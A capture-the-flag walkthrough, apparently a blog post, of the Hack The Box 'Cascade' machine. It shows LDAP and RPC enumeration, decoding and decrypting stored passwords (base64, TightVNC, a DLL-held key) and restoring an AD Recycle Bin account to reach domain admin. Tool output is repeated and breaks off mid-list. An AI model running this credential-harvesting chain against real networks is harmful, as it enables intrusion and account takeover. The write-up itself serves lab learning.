Tools: HTB - Cascade walkthrough
Initial Enumeration We got the following from the above scan: Let's enumerate further: We futher confirm the domain with ldapsearch As part of enumeration, I checked cascadeLegacyPwd with ldapsearch and got back Ryan Thompson password: clk0bjVldmE= The password seems to be encoded with base64, so let's decode it We got back Ryan plaintext password: rY4n5eva Now that we have a valid credentials, let's enumerate further with ldapsearch: I was able to get some users back with RPCClient: Let's format the domain usernames: With the list ready, let's confirm which names are valid with kerbrute: Out of 15names, we got back 11 valid name, let's move to AS-REP Roasting with GetNPUsers.py and no luck. Let's try the Ryan password we got earlier to see if there is a password re-use We confirm no password re-use and also confirm that thompson password is valid, so we have our first credentials r.thompson:rY4n5eva I tried to get into the host with evil_winrm and RDP but no luck so I tried to see what shared do I have READ access to via crackmapexec: r.thompson has read access on Data, so let's get into data with SMBclient and start our enumeration: During enumeration, I found a Meeting_Notes_June_2018.html in the IT folder, when I downloaded, I found a new username:TempAdmin in the note, saying the user TempAdmin has the same right as the domain admin Futher enumeration reveal another file VNC Install.reg in s.smith folder, I downloaded the file, and I found a registry export contains a TightVNC encrypted password Using a TightVNC decryptor on those hex bytes, yields the password: sT333ve2 Let's confirm if the password is valid with kerbrute. We got s.smith back as the valid owner of the newly found password: sT333ve2 Now we have another user, I tried to get shell with evil-winrm, and it was successful Let's start enumerating, I log to SMB with the newly found credentials for further enumeration, I found DB, inside DB folder, I found Audit.db so I downloaded it and access with sqlite3 on my local system: I found the service account credentials for ArkSvc. The string BQO5l5Kj9MdErXx6Q6AGOw== is definitely encrypted or encoded, and since it’s stored in a database alongside a custom crypto DLL (CascCrypto.dll), it’s likely encrypted using a hardcoded key. I read how to get the key, I found that the decryption logic is most likely be hidden inside CascCrypto.dll , so I went hunting CascCrypto.dll Going back to SMB, the file, CascCrypto.dll is seated in the same folder with the DB, so I downloaded it I ran the code below to get the string to decode strings -e l CascCrypto.dll I got the string 1tdyjCbY1Ix49842 back. After many readings, finally, I was able to decrypt the string and got back plaintext password: w3lc0meFr31nd We have another set of credentials ArkSvc:w3lc0meFr31nd
I was able to get shell with the newly found password Remember we saw a Meeting_Notes_June_2018.html in the SMB earlier that talk about TempAdmin with the newly found credentials ArkSvc, and because ArkSvc user is part of CASCADE\AD Recycle Bin let's try to check if we can find the TempAdmin account in the recycle bin, if we are to do that, we can get back it's password as well: we found cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz for TempAdmin, the string looks like base64, let's decode it. The decoded plaintext is baCT3r1aN00dles Do you remember this phrase in the meeting note Username is TempAdmin (password is the same as the normal admin account password). So with the TempAdmin credentials have the same right as the Domain Admin. Let try to get on the host with TempAdmin : baCT3r1aN00dles We are domain Admin.. Game over!!!! Templates let you quickly answer FAQs or store snippets for re-use. Hide child comments as well For further actions, you may consider blocking this person and/or reporting abuse
$ ┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.246
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-06 18:59 CDT
Nmap scan report for 10.129.29.246
Host is up (0.0082s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-07 00:01:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results:
| smb2-time: | date: 2026-05-07T00:02:17
|_ start_date: 2026-05-06T23:56:22
|_clock-skew: 2s
| smb2-security-mode: | 2:1:0: |_ Message signing enabled and required TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 8.51 ms 10.10.14.1
2 8.66 ms 10.129.29.246 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.64 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.246
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-06 18:59 CDT
Nmap scan report for 10.129.29.246
Host is up (0.0082s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-07 00:01:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results:
| smb2-time: | date: 2026-05-07T00:02:17
|_ start_date: 2026-05-06T23:56:22
|_clock-skew: 2s
| smb2-security-mode: | 2:1:0: |_ Message signing enabled and required TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 8.51 ms 10.10.14.1
2 8.66 ms 10.129.29.246 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.64 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ nmap -A -p- 10.129.29.246
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-05-06 18:59 CDT
Nmap scan report for 10.129.29.246
Host is up (0.0082s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-05-07 00:01:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results:
| smb2-time: | date: 2026-05-07T00:02:17
|_ start_date: 2026-05-06T23:56:22
|_clock-skew: 2s
| smb2-security-mode: | 2:1:0: |_ Message signing enabled and required TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 8.51 ms 10.10.14.1
2 8.66 ms 10.129.29.246 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.64 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts # #
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local # search result
search: 2
result: 0 Success # numResponses: 2
# numEntries: 1
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts # #
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local # search result
search: 2
result: 0 Success # numResponses: 2
# numEntries: 1
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts # #
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local # search result
search: 2
result: 0 Success # numResponses: 2
# numEntries: 1
echo "clk0bjVldmE=" | base64 -d
echo "clk0bjVldmE=" | base64 -d
echo "clk0bjVldmE=" | base64 -d
──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -b "dc=cascade,dc=local" "(cascadeLegacyPwd=*)" cascadeLegacyPwd
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (cascadeLegacyPwd=*)
# requesting: cascadeLegacyPwd # # Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE= # search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local # search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local # search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local # search result
search: 2
result: 0 Success # numResponses: 5
# numEntries: 1
# numReferences: 3
──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -b "dc=cascade,dc=local" "(cascadeLegacyPwd=*)" cascadeLegacyPwd
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (cascadeLegacyPwd=*)
# requesting: cascadeLegacyPwd # # Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE= # search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local # search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local # search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local # search result
search: 2
result: 0 Success # numResponses: 5
# numEntries: 1
# numReferences: 3
──╼ [★]$ ldapsearch -x -H ldap://10.129.29.246 -b "dc=cascade,dc=local" "(cascadeLegacyPwd=*)" cascadeLegacyPwd
# extended LDIF
#
# LDAPv3
# base <dc=cascade,dc=local> with scope subtree
# filter: (cascadeLegacyPwd=*)
# requesting: cascadeLegacyPwd # # Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE= # search reference
ref: ldap://ForestDnsZones.cascade.local/DC=ForestDnsZones,DC=cascade,DC=local # search reference
ref: ldap://DomainDnsZones.cascade.local/DC=DomainDnsZones,DC=cascade,DC=local # search reference
ref: ldap://cascade.local/CN=Configuration,DC=cascade,DC=local # search result
search: 2
result: 0 Success # numResponses: 5
# numEntries: 1
# numReferences: 3
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $> rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
I further enumerate domain with enum4linux and I got back some users and some domains info:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4) ==========================
| Target Information | ==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s) ======================================
| Listener Scan on 10.129.29.246 | ======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp =====================================================
| Domain Information via LDAP for 10.129.29.246 | =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local ============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.246 | ============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out ==========================================
| SMB Dialect Check on 10.129.29.246 | ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects: SMB 1.0: false SMB 2.02: true SMB 2.1: true SMB 3.0: false SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true ============================================================
| Domain Information via SMB session for 10.129.29.246 | ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE ==========================================
| RPC Session Check on 10.129.29.246 | ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE ====================================================
| Domain Information via RPC for 10.129.29.246 | ====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member ================================================
| OS Information via RPC for 10.129.29.246 | ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null ======================================
| Users via RPC on 10.129.29.246 | ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106': username: arksvc name: ArkSvc acb: '0x00000210' description: (null)
'1107': username: s.smith name: Steve Smith acb: '0x00000210' description: (null)
'1109': username: r.thompson name: Ryan Thompson acb: '0x00000210' description: (null)
'1111': username: util name: Util acb: '0x00000210' description: (null)
'1116': username: j.wakefield name: James Wakefield acb: '0x00000210' description: (null)
'1121': username: s.hickson name: Stephanie Hickson acb: '0x00000210' description: (null)
'1122': username: j.goodhand name: John Goodhand acb: '0x00000210' description: (null)
'1124': username: a.turnbull name: Adrian Turnbull acb: '0x00000214' description: (null)
'1127': username: e.crowe name: Edward Crowe acb: '0x00000211' description: (null)
'1128': username: b.hanson name: Ben Hanson acb: '0x00000211' description: (null)
'1129': username: d.burman name: David Burman acb: '0x00000210' description: (null)
'1130': username: BackupSvc name: BackupSvc acb: '0x00000210' description: (null)
'1134': username: j.allen name: Joseph Allen acb: '0x00000210' description: (null)
'1135': username: i.croft name: Ian Croft acb: '0x00000211' description: (null)
'501': username: CascGuest name: (null) acb: '0x00000215' description: Built-in account for guest access to the computer/domain =======================================
| Groups via RPC on 10.129.29.246 | =======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102': groupname: DnsAdmins type: local
'1103': groupname: DnsUpdateProxy type: domain
'1113': groupname: IT type: local
'1114': groupname: Production type: local
'1115': groupname: HR type: local
'1119': groupname: AD Recycle Bin type: local
'1120': groupname: Backup type: local
'1123': groupname: Temps type: local
'1125': groupname: WinRMRemoteWMIUsers__ type: local
'1126': groupname: Remote Management Users type: local
'1132': groupname: Factory type: local
'1133': groupname: Finance type: local
'1137': groupname: Audit Share type: local
'1138': groupname: Data Share type: local
'498': groupname: Enterprise Read-only Domain Controllers type: domain
'513': groupname: Domain Users type: domain
'514': groupname: Domain Guests type: domain
'515': groupname: Domain Computers type: domain
'517': groupname: Cert Publishers type: local
'520': groupname: Group Policy Creator Owners type: domain
'545': groupname: Users type: builtin
'546': groupname: Guests type: builtin
'553': groupname: RAS and IAS Servers type: local
'554': groupname: Pre-Windows 2000 Compatible Access type: builtin
'555': groupname: Remote Desktop Users type: builtin
'556': groupname: Network Configuration Operators type: builtin
'557': groupname: Incoming Forest Trust Builders type: builtin
'558': groupname: Performance Monitor Users type: builtin
'559': groupname: Performance Log Users type: builtin
'560': groupname: Windows Authorization Access Group type: builtin
'561': groupname: Terminal Server License Servers type: builtin
'562': groupname: Distributed COM Users type: builtin
'568': groupname: IIS_IUSRS type: builtin
'569': groupname: Cryptographic Operators type: builtin
'571': groupname: Allowed RODC Password Replication Group type: local
'572': groupname: Denied RODC Password Replication Group type: local
'573': groupname: Event Log Readers type: builtin
'574': groupname: Certificate Service DCOM Access type: builtin =======================================
| Shares via RPC on 10.129.29.246 | =======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user ==========================================
| Policies via RPC for 10.129.29.246 | ==========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information: Password history length: None Minimum password length: 5 Maximum password age: not set Password properties: - DOMAIN_PASSWORD_COMPLEX: false - DOMAIN_PASSWORD_NO_ANON_CHANGE: false - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information: Lockout observation window: 30 minutes Lockout duration: 30 minutes Lockout threshold: None
Domain logoff information: Force logoff time: not set ==========================================
| Printers via RPC for 10.129.29.246 | ==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED Completed after 6.83 seconds
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ rpcclient -U "" -N 10.129.29.246
rpcclient $> rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
I further enumerate domain with enum4linux and I got back some users and some domains info:
┌─[eu-dedivip-4]─[10.10.15.199]─[iamdayone@htb-ry9shcrlcd]─[~]
└──╼ [★]$ enum4linux 10.129.29.246
ENUM4LINUX - next generation (v1.3.4) ==========================
| Target Information | ==========================
[*] Target ........... 10.129.29.246
[*] Username ......... ''
[*] Random Username .. 'pnpssmjg'
[*] Password ......... ''
[*] Timeout .......... 5 second(s) ======================================
| Listener Scan on 10.129.29.246 | ======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp =====================================================
| Domain Information via LDAP for 10.129.29.246 | =====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: cascade.local ============================================================
| NetBIOS Names and Workgroup/Domain for 10.129.29.246 | ============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out ==========================================
| SMB Dialect Check on 10.129.29.246 | ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects: SMB 1.0: false SMB 2.02: true SMB 2.1: true SMB 3.0: false SMB 3.1.1: false
Preferred dialect: SMB 2.1
SMB1 only: false
SMB signing required: true ============================================================
| Domain Information via SMB session for 10.129.29.246 | ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: CASC-DC1
NetBIOS domain name: CASCADE
DNS domain: cascade.local
FQDN: CASC-DC1.cascade.local
Derived membership: domain member
Derived domain: CASCADE ==========================================
| RPC Session Check on 10.129.29.246 | ==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE ====================================================
| Domain Information via RPC for 10.129.29.246 | ====================================================
[+] Domain: CASCADE
[+] Domain SID: S-1-5-21-3332504370-1206983947-1165150453
[+] Membership: domain member ================================================
| OS Information via RPC for 10.129.29.246 | ================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 7, Windows Server 2008 R2
OS version: '6.1'
OS release: ''
OS build: '7601'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null ======================================
| Users via RPC on 10.129.29.246 | ======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 15 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 15 user(s) via 'enumdomusers'
[+] After merging user results we have 15 user(s) total:
'1106': username: arksvc name: ArkSvc acb: '0x00000210' description: (null)
'1107': username: s.smith name: Steve Smith acb: '0x00000210' description: (null)
'1109': username: r.thompson name: Ryan Thompson acb: '0x00000210' description: (null)
'1111': username: util name: Util acb: '0x00000210' description: (null)
'1116': username: j.wakefield name: James Wakefield acb: '0x00000210' description: (null)
'1121': username: s.hickson name: Stephanie Hickson acb: '0x00000210' description: (null)
'1122': username: j.goodhand name: John Goodhand acb: '0x00000210' description: (null)
'1124': username: a.turnbull name: Adrian Turnbull acb: '0x00000214' description: (null)
'1127': username: e.crowe name: Edward Crowe acb: '0x00000211' description: (null)
'1128': username: b.hanson name: Ben Hanson acb: '0x00000211' description: (null)
'1129': username: d.burman name: David Burman acb: '0x00000210' description: (null)
'1130': username: BackupSvc name: BackupSvc acb: '0x00000210' description: (null)
'1134': username: j.allen name: Joseph Allen acb: '0x00000210' description: (null)
'1135': username: i.croft name: Ian Croft acb: '0x00000211' description: (null)
'501': username: CascGuest name: (null) acb: '0x00000215' description: Built-in account for guest access to the computer/domain =======================================
| Groups via RPC on 10.129.29.246 | =======================================
[*] Enumerating local groups
[+] Found 17 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 15 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 6 group(s) via 'enumdomgroups'
[+] After merging groups results we have 38 group(s) total:
'1102': groupname: DnsAdmins type: local
'1103': groupname: DnsUpdateProxy type: domain
'1113': groupname: IT type: local
'1114': groupname: Production type: local
'1115': groupname: HR type: local
'1119': groupname: AD Recycle Bin type: local
'1120': groupname: Backup type: local
'1123': groupname: Temps type: local
'1125': groupname: WinRMRemoteWMIUsers__ type: local
'1126': groupname: Remote Management Users type: local
'1132': groupname: Factory type: local
'1133': groupname: Finance type: local
'1137': groupname: Audit Share type: local
'1138': groupname: Data Share type: local
'498': groupname: Enterprise Read-only Domain Controllers type: domain
'513': groupname: Domain Users type: domain
'514': groupname: Domain Guests type: domain
'515': groupname: Domain Computers type: domain
'517': groupname: Cert Publishers type: local
'520': groupname: Group Policy Creator Owners type: domain
'545': groupname: Users type: builtin
'546': groupname: Guests type: builtin
'553': groupname: RAS and IAS Servers type: local
'554': groupname: Pre-Windows 2000 Compatible Access type: builtin
'555': groupname: Remote Desktop Users type: builtin
'556': groupname: Network Configuration Operators type: builtin
